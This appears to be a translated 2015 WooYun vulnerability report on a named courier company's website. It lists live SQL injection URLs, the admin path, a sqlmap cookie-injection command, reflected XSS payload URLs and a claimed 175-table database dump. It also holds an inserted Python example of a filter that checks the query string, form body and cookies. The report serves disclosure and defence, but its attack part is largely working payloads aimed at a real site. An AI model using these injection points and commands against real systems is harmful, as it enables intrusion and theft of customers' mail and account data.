Vulnerability summary
Title: Multiple vulnerabilities in the 运通(中港)速运 (Yuntong China-Hong Kong Express) main site (SQL injection / XSS / WAF bypass) leading to disclosure of a large volume of mail information
Submitted: 2015-10-04 10:03
Fixed: 2015-11-18 10:04
Disclosed: 2015-11-18 10:04
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 10
Status: vendor could not be contacted, or vendor actively ignored the report
Tags:
None
Vulnerability details. Disclosure status:
2015-10-04: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-11-18: vendor has actively ignored the vulnerability; details disclosed to the public
Brief description: Multiple vulnerabilities in the 运通(中港)速运 main site (SQL injection, XSS, firewall bypass)
Detailed description:
[Site architecture analysis]: The main site uses an Access database (which stores the main-site page content) and an Oracle database (which stores mail and account information). sqlmap fingerprint:
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
[Admin backend]: http://www.ytkd168.com/root/
[Ordinary injection points]:
http://www.ytkd168.com/Service_search.asp?keyword=88952634&Submit=%26nbsp%3B%26nbsp%3B%26nbsp%3B%26nbsp%3B%EF%BF%BD%EF%BF%BD%D1%AF&select=all
http://www.ytkd168.com/Query.asp?ID=%27%0D%0A&button=%26%23160%3B%26%23160%3B%26%23160%3B%26%23160%3B%B2%E9+%D1%AF
The second injection point works over both GET and POST. Testing by hand, entering a single ' produces a database error at the bottom of the page:
OraOLEDB 错误 '80004005' ORA-01756: 引号内的字符串没有正确结束 /Query.asp,行 260
sqlmap screenshot:
[Current database]: OREAD
[Firewall bypass for injection and XSS]: Calling this a firewall bypass is generous; the filtering software is simply far too crude. SQL injection goes straight through via the cookie, and the XSS is "impossible to guard against". Examples:
[Cookie injection]: http://www.ytkd168.com/ShowNews.asp?id=517
Testing by hand, the server returns a block message for the query-string parameter; the common cookie-bypass technique applies. sqlmap command:
sqlmap.py -u "http://www.ytkd168.com/ShowNews.asp" --cookie "id=517" --level 2
sqlmap screenshot:
[XSS]:
http://www.ytkd168.com/feedback.asp?type=%D3%A6%C6%B8&zw=%20%27%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C%22
This one has no protection at all.
http://www.ytkd168.com/?button=%27%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C%22
This one is blocked on the first request, but the payload still fires after the page redirects.
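The root cause behind both the cookie injection and the XSS above is a filter that only looks at the query string, so an unchanged value in a different request slot is never examined. The following is an added example, not code from the original report or from the site: a hypothetical `inspect_request` check that applies the same signatures to query string, form body and cookies, with constructed requests that mirror the report's `id=517` cookie and the `zw` parameter of feedback.asp.

```python
import re
from urllib.parse import parse_qsl

# Minimal signatures for the two input classes the report shows: an unbalanced
# single quote (breaks an Oracle string literal, cf. ORA-01756) and an inline
# script tag or attribute breakout. Real rule sets are far broader.
SQLI_RE = re.compile(r"'(?:\s*(?:--|or|and|union)\b|\s*$)", re.I)
XSS_RE = re.compile(r"<\s*script\b|['\"]\s*>", re.I)


def parse_cookie(header: str) -> dict:
    """Parse a Cookie header ('a=1; b=2') into a dict, keeping raw values."""
    out = {}
    for part in header.split(";"):
        part = part.strip()
        if part:
            key, _, value = part.partition("=")
            out[key.strip()] = value
    return out


def collect_inputs(request: dict) -> list:
    """Flatten query string, form body and cookies into (source, name, value)."""
    items = []
    for name, value in parse_qsl(request.get("query", ""), keep_blank_values=True):
        items.append(("query", name, value))
    for name, value in parse_qsl(request.get("body", ""), keep_blank_values=True):
        items.append(("body", name, value))
    for name, value in parse_cookie(request.get("cookie", "")).items():
        items.append(("cookie", name, value))
    return items


def inspect_request(request: dict, sources=("query", "body", "cookie")) -> list:
    """Return findings such as 'sqli:cookie:id'. Restricting `sources` to
    ("query",) models the query-string-only filter the report describes."""
    findings = []
    for source, name, value in collect_inputs(request):
        if source not in sources:
            continue
        if SQLI_RE.search(value):
            findings.append(f"sqli:{source}:{name}")
        if XSS_RE.search(value):
            findings.append(f"xss:{source}:{name}")
    return findings


# Constructed sample requests (hypothetical, modelled on the report's URLs).
COOKIE_INJECTION = {"query": "", "cookie": "id=517'"}
FEEDBACK_XSS = {"query": "type=x&zw='\"><script>alert(1);</script><\""}
QUERY_ASP_INJECTION = {"query": "ID=%27%0D%0A&button=x"}
```

Run with the query-only source list, the cookie request passes clean; with all sources inspected, the same value is flagged.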
Proof of vulnerability: YT database information
Database: YT [175 tables]
Fix recommendation:
Copyright notice: please credit the source when reposting. 路人甲 @乌云
Vulnerability response. Vendor response: vendor could not be contacted, or vendor actively refused
Vulnerability Rank: 15 (WooYun rating)